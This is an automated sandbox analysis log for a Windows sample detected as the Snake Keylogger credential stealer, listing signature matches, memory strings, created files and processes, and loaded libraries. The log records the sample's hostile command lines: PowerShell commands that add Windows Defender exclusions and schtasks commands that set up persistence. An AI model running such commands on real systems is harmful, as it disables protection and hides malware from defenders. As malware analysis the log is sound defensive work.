            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 9.2.zZlsXaceOG.exe.44f12f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 9.2.zZlsXaceOG.exe.44f12f8.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 9.2.zZlsXaceOG.exe.44f12f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 9.2.zZlsXaceOG.exe.44f12f8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000008.00000002.3639199357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000D.00000002.3639123759.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000009.00000002.1277566601.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000009.00000002.1277566601.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.1236876601.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.1236876601.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: hcy2SdW2z6.exe PID: 7704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: hcy2SdW2z6.exe PID: 7704, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: hcy2SdW2z6.exe PID: 8176, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: zZlsXaceOG.exe PID: 7440, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: zZlsXaceOG.exe PID: 7440, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: zZlsXaceOG.exe PID: 504, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: hcy2SdW2z6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: zZlsXaceOG.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, -KU.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, -KU.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, -KU.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, -KU.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, yOM0bRb7wDu62SICtB.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, yOM0bRb7wDu62SICtB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, Na63LTehrWkdCYtgr5.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, Na63LTehrWkdCYtgr5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, Na63LTehrWkdCYtgr5.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/20@2/3
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeFile created: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMutant created: \Sessions\1\BaseNamedObjects\ZOxEkLdpBDrfwkD
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeFile created: C:\Users\user\AppData\Local\Temp\tmpDE83.tmpJump to behavior
            Source: hcy2SdW2z6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: hcy2SdW2z6.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, hcy2SdW2z6.exe, 00000008.00000002.3644481905.0000000002E02000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, zZlsXaceOG.exe, 0000000D.00000002.3644075067.0000000002B00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: hcy2SdW2z6.exeVirustotal: Detection: 65%
            Source: hcy2SdW2z6.exeReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeFile read: C:\Users\user\Desktop\hcy2SdW2z6.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\hcy2SdW2z6.exe "C:\Users\user\Desktop\hcy2SdW2z6.exe"
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zZlsXaceOG.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Users\user\Desktop\hcy2SdW2z6.exe "C:\Users\user\Desktop\hcy2SdW2z6.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe C:\Users\user\AppData\Roaming\zZlsXaceOG.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpEF6B.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess created: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe "C:\Users\user\AppData\Roaming\zZlsXaceOG.exe"
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zZlsXaceOG.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Users\user\Desktop\hcy2SdW2z6.exe "C:\Users\user\Desktop\hcy2SdW2z6.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpEF6B.tmp"
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess created: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe "C:\Users\user\AppData\Roaming\zZlsXaceOG.exe"
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
